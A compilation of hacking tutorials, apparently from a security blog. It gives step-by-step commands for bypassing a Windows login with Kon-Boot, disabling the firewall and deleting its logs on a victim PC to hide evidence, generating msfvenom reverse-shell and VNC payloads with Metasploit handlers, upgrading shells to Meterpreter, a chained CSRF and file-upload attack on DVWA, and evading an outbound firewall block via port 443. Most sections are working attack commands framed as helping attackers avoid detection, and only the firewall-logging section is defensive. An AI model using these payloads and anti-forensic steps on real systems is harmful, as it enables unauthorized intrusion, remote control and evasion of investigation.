Bypass Windows Login Password using Android Phone with DriveDroid

Drive Droid is an Android application that allows you to boot your PC from ISO/IMG files stored on your phone. This is ideal for trying Linux distributions or always having a rescue-system on the go... without the need to burn different CDs or USB pen drives.

Drive Droid also includes a convenient download menu where you can download USB-images of a number of operating systems from your phone. You can also create USB-images which allow you to have a blank USB-drive where you can store files in. Blank images also allow you to use tools on your PC to burn images to the drive and create a bootable USB disk that way.

You can manually download it from google playstore.

Note: need root privilegde means you need rooted phone.

Let’s start!!!

Install DriveDroid app on your smartphone and run the application.

Click on plus sign at the lower right corner to add any iso image file.

Under preference here we need to select image directories so that we can browse konboot iso image file.

Further it will move into internal storage to let you choose your iso file, I have opt for konboot.iso and click on select (Please note that the kon-bootCD.iso file should exist on your phone)

Selected the koonboot iso file and it will get mounted

Tap on the mounted file and we can see three boot options as shown in the figure below Select the third option of CD-ROM and connect the smart phone with the system and reboot the system

Now plug the USB cable between phone and system for booting it from your phone and restart the system (pc) then continuously press function key of your desktop system.

Great!!! Successfully you will get administration console; now hit the enter button on the key board. This will bypass the admin console without entering password.

How to Delete Firewall Log in Remote PC using Metasploit

This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by firewall. Usually when an attacker establish the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of attacker. So if you are not aware of such things then you might leave an evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from victim’s PC.

Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.

First hack The Victim PC read Here

So now we are inside windows/system32 where we can perform admin level task. Type following command inside CMD shell to move inside the logs directory

cd logfiles/firewall

Type dir to observe the present directory of firewall.

Dir

From screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type following command to read firewall logs.

type pfirewall.log

So the highlighted log is showing MAC address of attacker system. Hence to protect yourself always delete these logs.

To delete pfirewall.log we must turn off firewall, type following command to disable firewall from victim PC.

Netsh firewall set opmode mode= DISABLE

Now type given below command to delete pfirewall.log

Del pfirewall.log

Now type given below command to verify pfirewall.log is still available or not in victim’s PC

type pfirewall.log

How to Enable and Monitor Firewall Log in Windows PC

LETS START!!!

Let have a look where you will learn more about firewall security. Open windows firewall then select advance setting on the left side under control panel home.

 Here we are at windows firewall advance setting; explore its property tab present on the right side of window’s frame.

Now you can see the local computer property dialog box has been opened, here select the private profile option.

Here another dialog box will get appear in front of you to configure private profile for firewall.

Only we need to manipulate two things in this profile without disturbing other settings. Change “NO (default)” into “YES” for log dropped packets and log successful connection as shown in given screenshot. At last click on OK.

Now again we are at advance security setting of firewall here bring your cursor down toward monitoring option.  From screenshot you can see window frame for firewall monitoring where it contains general and logging setting.  As we want to read firewall logs therefore now click on the blue link given as file name under logging setting.

GREAT!!! Finally we can read firewall log and can investigate firewall traffic in our network.

Hiding Shell with Prepend Migrate using Msfvenom

If you are a network penetration tester then you must read this article to enhance your skill. It is the part of advance penetration testing which might help in creating a strong payload for an attack to the targeted system. In this article your will learn more about the strength of msfvenom, here we will create such a payload which is different from my previous tutorial. The payload migrate its process if current process gets killed hence attacker will not lose his session if victim kills the current process ID of the payload from its system.

LETS!!! START

Open the terminal in kali Linux and type following command to generate exe payload.

Msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.104 lport=5555 prependmigrate=true prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe

Above command will create the raj.exe file on the Desktop now send this file to remote system for attack

Load metasploit framework and type following command to start the attack.

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

When victim will open raj.exe file we will get meterpreter session.

meterpreter> sysinfo

Now let check the process ID of our payload.

meterpreter> ps

From the highlighted text you can read the process ID shown for raj.exe i.e. 4960.

Now attacker tries himself to kill the current process state for raj.exe to verify process migration, as result process 4960 get killed.

meterpreter> kill 4960

But!!!  Still we have victim’s session which means raj.exe file migrate into new process ID.

meterpreter> sysinfo

Shell to Meterpreter using Session Command

In previous article we have seen how to upgrade a command shell into meterpreter using Post exploitation in metasploit. Again we are going to perform same task using a different technique.

LETS BEGIN!!!

msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.

Once you got the reverse connection of remote system and access its command shell through metasploit now you can manipulate your active sessions.  You just need to type sessions –h as command inside metasploit, this help command will display the multiple option which can be utilized with active session.

msf auxiliary(telnet_login) >sessions –h

So in the following screenshot you can perceive that the highlighted option is used to upgrade a command shell into meterpreter session.

Since we have command shell so here we can use “-u” (option) with session ID for upgrading our shell into meterpreter session. Execute following command for session manipulation.

msf auxiliary(telnet_login) >sessions –u 1

When you will execute above command you will get meterpreter session as session 2. Now enjoy your meterpreter session and execute its command.

msf auxiliary(telnet_login) >sessions

Capture VNC Session of Remote PC using Msfvenom

Today in this article we’ll try to compromise the target using VNCpayload. In this tutorial you’ll learn how to create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.

Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

Msfvenom –p windows/vncinject/reverse_tcp lhost=192.168.1.15 lport=4444 –f exe > /root/Desktop/vnc.exe

Now the above command will generate an exe file for the VNC payload on the desktop of Kali Linux. Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

How to Upgrade Shell to Meterpreter

In network penetration testing, we always wish to hack a system of an internal network and try to make unauthorized access through a meterpreter session using the Metasploit framework.  But there are some exploits which will directly provide victim’s command shell instead of meterpreter session. In this article, we have tried to upgrade from the victim’s shell to a meterpreter shell.

Now once we have access to victims command shell then follow the steps given below to upgrade a command shell into the meterpreter shell.

Here I already have access to command shell of victim’s PC

So now we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Execute the following command for session manipulation.

Other Way

This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected.

use post/multi/manage/shell_to_meterpreter

msf post(shell_to_meterpreter) > set session 1

msf post(shell_to_meterpreter) > exploit

Bypass CSRF Medium Security in DVWA

In previous article we have discussed about how to bypass low level security if a web application server is suffering from cross site request forgery (CSRF). Today we will see how to exploit a web application server with CSRF attack if the security level get increased or say set to medium and try to change the password of admin without his permission.

Let’s start!!!

Again I have target DVWA for this tutorial and by default the credential set for it is admin: password. As you can see I have used them for login in DVWA

Set security level medium select the bug cross site request forgery as current vulnerability.  Here you see the text fields are given for changing the password of the database for user admin.

If you remembered in the previous article we have executed csrf.html file to change the password for admin when security level is low.

In following screenshot you can see I have given value= “hacker” as new password and confirm password.

Now I am going to test whether the same file csrf.html would be capable to change the password for admin when security level is medium. From screenshot you can see I try to execute csrf.html file which might reset the password.

As result you can see I didn’t successes to bypass medium security using csrf.html and got an error message “that request didn’t look correct”. Hence the technique which we have used in low security will get failed in medium security level.

Sometimes it might be possible that a web application server may have more than one vulnerabilities in it. It could be a big advantage because making use of other vulnerability we can perform an action to execute our malicious file through it.

 Now first of all change csrf.html into csrf.php file, then set low security level and switch into file uploading vulnerability inside DVWA.

 Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.

Now browse the path 192.168.1.102:81/dvwa/hackable/uploads/csrf.php in URL to execute csrf.php file and click on change button.

GREAT!!!

From screenshot you can see without admin permission we have successfully changed his password.

Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.

Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass medium security in DVWA.

How to set and Bypass Outbound Rule in Windows Firewall using Metasploit

In previous the firewall penetration testing article you might have read how firewall is used for blocking any particular port in a network to prevent hackers or malicious software from gaining access to your PC. This article is written to describe that how an attacker can bypass firewall rules and try to make unauthorized access of victim’s PC.

Target: windows PC

Attacker: Kali Linux

Lets start!!!

Open window firewall control panel and select Advance setting to configure firewall rules as shown in screenshot.

Go to outbound rules to configure new rule for firewall to add security layer in network to secure it form attackers.

Select the type of firewall rule to be created click radio button for option Port that controls connections for a TCP and UDP port then click on next.

Now specify the protocol and port to which rule is applies therefore I choose TCP and then specify port 4444 on which this rule will applies and then click on next.

 Select radio button for block the connection when connection matches to the condition specified condition.

Select all check boxes when this rule applies.

Here give the name to your own specified rule.  You can see in the screenshot I had named it block port 4444 and then click on finished.

Here you can see the new outbound rule is added into the list of outbound rules. Hence victim has defense himself from establishing connection with port 4444, now if attacker try to connect with victim through port 4444 then it might be possible that attacker doesn’t receive any reverse connection.

Now let’s examine when an attacker tries to send malicious file using port 4444, will it work or not. Does attacker able to receive reverse connection of victim’s pc?

Here I have generated a malicious file using msfvenom in the format of .exe file and then send this 4444.exe file to victim and start multi handler at background.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f exe > /root/Desktop/4444.exe

Now let’s find whether we will succeed or get failed to achieve reverse connection of victims PC.

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.102

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

OOPS!!!  No response

It means we get failed in establishing connection between victim and attacker. Now as we know victim has protected himself from connecting with port 4444.

Now whenever you face such type of restriction for establishing connection with victim then do not get disappoint think twice what is the aim of an attack? He only wants to trap victim and want to establish a connection.

Now send your malicious file on those ports which always left open for incoming and outgoing connection.  For example port 80, port 443, port 445 and etc.

When again an attacker tries to send malicious file using port 443. Does attacker able to receive reverse connection of victim’s pc?

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.102 lport=443 -f exe > /root/Desktop/443.exe

 Start multi handler and send 443.exe to victim.

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_http

msf exploit(handler) > set lhost 192.168.1.102

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

GREAT!!!  Attack is successful

We successfully got meterpreter session of victim’s PC inside the metasploit framework.